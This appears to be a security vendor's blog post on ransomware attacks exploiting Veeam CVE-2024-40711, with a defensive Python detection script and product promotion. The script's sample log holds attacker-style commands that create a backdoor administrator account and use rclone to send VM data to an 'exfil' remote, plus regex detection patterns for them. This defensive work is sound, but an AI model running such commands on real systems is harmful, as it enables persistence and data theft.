
A newly disclosed vulnerability in Veeam Backup & Replication software, CVE-2024-40711, has become a focal point for cybercriminals, resulting in a string of ransomware attacks that have affected organizations globally.

This vulnerability, a deserialization flaw rated 9.8 out of 10 on the CVSS scale, allows an unauthenticated attacker to execute code remotely on the backup server. Veeam fixed it in Backup & Replication 12.2 (build 12.2.0.334). Threat actors have capitalized on the flaw, deploying the Akira and Fog ransomware families to disrupt operations and exfiltrate sensitive data.

The Attack: How it Happened

The exploitation of the Veeam vulnerability typically began with attackers entering corporate networks through VPN gateways using compromised credentials. Many of these gateways were running unsupported software and had no multifactor authentication, so a stolen password alone was enough to get in. Once inside, the attackers sent requests to the vulnerable /trigger URI on port 8000 of the Veeam Backup & Replication server.

Through this URI, attackers executed commands via the Veeam.Backup.MountService.exe process, which spawned net.exe to create local accounts and add them to the local Administrators and Remote Desktop Users groups. These accounts were then used to deploy ransomware, including Akira and Fog, against critical systems such as Hyper-V hosts. In one instance the attackers used the Rclone tool to exfiltrate data before encrypting, so the intrusion was a data breach as well as a disruption.

What made this vulnerability especially dangerous is that no credentials are needed: anyone who can reach port 8000 on the backup server can execute code on it. Once attackers had that foothold, they could create privileged accounts, disable or evade security tooling, and encrypt the very systems the organization would normally restore from, crippling both operations and recovery.
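As an added example (not code from the original article, from Veeam, or from the researchers who reported these intrusions), the following Python script shows how a defender could hunt for the post-exploitation chain described above in process-creation telemetry, and check a Backup & Replication build against the fixed build. The log records, host names, account names and paths are constructed for the example, and the pipe-separated record format is invented; map the fields onto your own Sysmon Event ID 1 or EDR export.

```python
"""
Added example, not code from the original article, Veeam or the researchers who
reported the intrusions. Flags two behaviours from the write-up:
  1. Veeam.Backup.MountService.exe spawning net.exe to create a local account or
     add one to Administrators / Remote Desktop Users, and
  2. rclone being launched (exfiltration candidate).
Also compares a Backup & Replication build against the fixed build 12.2.0.334.
"""
import re
from dataclasses import dataclass

# Build that fixed CVE-2024-40711 (Veeam Backup & Replication 12.2).
FIXED_BUILD = (12, 2, 0, 334)

# Constructed log (hosts, account names and paths are made up):
# one record per line, 'host|parent_image|image|command_line'.
SAMPLE_LOG = r"""
VBR01|C:\Program Files\Veeam\Backup and Replication\Backup\Veeam.Backup.MountService.exe|C:\Windows\System32\net.exe|net user svc_bkp2 Pa55w0rd! /add
VBR01|C:\Program Files\Veeam\Backup and Replication\Backup\Veeam.Backup.MountService.exe|C:\Windows\System32\net.exe|net localgroup administrators svc_bkp2 /add
VBR01|C:\Program Files\Veeam\Backup and Replication\Backup\Veeam.Backup.MountService.exe|C:\Windows\System32\net.exe|net localgroup "Remote Desktop Users" svc_bkp2 /add
VBR01|C:\Windows\explorer.exe|C:\Windows\System32\net.exe|net use Z: \\fs01\backups
HV02|C:\Windows\System32\cmd.exe|C:\Users\svc_bkp2\rclone.exe|rclone copy C:\ClusterStorage\vms remote:exfil -P
"""


@dataclass
class ProcEvent:
    host: str
    parent_image: str
    image: str
    command_line: str


def parse_events(text):
    """Parse the pipe-separated records (a format invented for this example)."""
    events = []
    for line in text.strip().splitlines():
        host, parent, image, cmd = line.split("|", 3)
        events.append(ProcEvent(host, parent, image, cmd))
    return events


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


# net.exe / net1.exe creating an account or adding one to a privileged local group.
NET_ACCOUNT_CHANGE = re.compile(
    r'\bnet1?(\.exe)?\s+(user\s+\S+.*\s/add|localgroup\s+"?(administrators|remote desktop users)"?\s+\S+\s+/add)',
    re.IGNORECASE,
)
# rclone invoked in a way that moves data somewhere.
RCLONE_CMD = re.compile(r"\brclone(\.exe)?\s+(copy|sync|move)\b", re.IGNORECASE)


def detect(events):
    """Return (host, rule, command_line) tuples for events matching either rule."""
    findings = []
    for ev in events:
        parent, child = basename(ev.parent_image), basename(ev.image)
        # Rule 1: the Veeam mount service should never be creating accounts.
        if (parent == "veeam.backup.mountservice.exe"
                and child in ("net.exe", "net1.exe")
                and NET_ACCOUNT_CHANGE.search(ev.command_line)):
            findings.append((ev.host, "veeam-mountservice-account-change", ev.command_line))
        # Rule 2: rclone on a backup or hypervisor host is an exfiltration candidate.
        if child == "rclone.exe" or RCLONE_CMD.search(ev.command_line):
            findings.append((ev.host, "rclone-exfil-candidate", ev.command_line))
    return findings


def needs_patch(version):
    """True if a Backup & Replication build string is older than 12.2.0.334.

    Veeam's advisory lists 12.1.2.172 and earlier 12.x builds as affected; older,
    unsupported branches are treated conservatively as needing an upgrade too.
    """
    parts = tuple(int(p) for p in version.split("."))
    parts += (0,) * (4 - len(parts))
    return parts < FIXED_BUILD


if __name__ == "__main__":
    for host, rule, cmd in detect(parse_events(SAMPLE_LOG)):
        print(f"{host}: {rule}: {cmd}")
    for v in ("12.1.2.172", "12.2.0.334"):
        print(v, "needs patch" if needs_patch(v) else "fixed build")
```

Rule 1 is deliberately narrow (the mount service as parent, net.exe as child, an /add operation) so it stays quiet on normal backup activity; if your telemetry records parent process reliably, any child of Veeam.Backup.MountService.exe other than Veeam's own binaries is also worth a look. The `net use` record is included to show that net.exe alone is not a signal.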

The Ransomware Payloads: Akira and Fog

Both Akira and Fog ransomware are known for their devastating impact. Akira, first observed in March 2023, quickly gained a reputation for fast encryption of large data sets. It uses a hybrid scheme, encrypting file contents with a symmetric cipher and protecting the per-file keys with an RSA public key, and demands a ransom in exchange for the decryption key. Fog, first seen in 2024, is less well known but no less dangerous; its operators have favored compromised VPN credentials for entry and unprotected servers, including backup infrastructure, as targets.

In the reported cases, the attackers deployed the ransomware on Hyper-V servers, which host the virtual machines behind much of an enterprise's infrastructure. Encrypting a Hyper-V host takes every VM on it down at once and, when the backup server has been compromised as well, leaves little to restore from, making recovery and mitigation far more difficult.

The exploitation of Veeam’s vulnerability not only provided an entry point for ransomware but also exposed the broader risk of poorly secured backup systems. These systems are often neglected in cybersecurity strategies, yet they are a rich target for attackers looking to disrupt businesses and hold data hostage.

How Beam Can Help Prevent These Types of Attacks

The Veeam vulnerability and subsequent ransomware attacks underscore the importance of securing remote access and backup systems. This is where Beam comes in, offering a robust solution to help prevent similar attacks from taking root in your network.

1. Always-On VPN Protection

Beam enforces a strict always-on VPN policy, so all traffic from remote devices is tunneled through the corporate VPN rather than exposed on the public internet, and users cannot disable or tamper with their VPN configuration. In the Veeam intrusions the attackers entered through VPN gateways using stolen credentials, so the tunnel itself must still be backed by multifactor authentication on every VPN account; always-on enforcement closes the complementary gap of endpoints whose traffic or configuration has been left unprotected.

2. Hypervisor-Level Security

Beam’s MicroV hypervisor runs beneath the operating system, owns the physical network interfaces, and forces all guest traffic through encrypted VPN tunnels. Because the guest OS never controls the interface directly, malware that compromises the endpoint cannot bypass the tunnel, disable the VPN, or reach the network outside it. In a breach like the Veeam intrusions, an attacker who lands on a Beam-protected endpoint cannot alter its VPN settings or reroute its traffic.

3. Centrally Managed VPN Configurations

In the Veeam intrusions, the weak point was the VPN itself: gateways running outdated software with no multifactor authentication. Beam lets administrators manage VPN configurations centrally, so every endpoint is configured securely and consistently and individual users cannot introduce the kind of error that leaves a system exposed.

Beam ensures that all traffic is encrypted and that network interfaces are managed at the hypervisor level, where an attacker on the endpoint cannot reach them. These controls complement, rather than replace, the basics the Veeam cases demand: patch Backup & Replication to 12.2.0.334 or later, enforce MFA on every VPN account, and keep port 8000 on the backup server unreachable from untrusted networks. Layering security at every level is how organizations protect their most valuable systems and data from the ever-growing threat of ransomware.

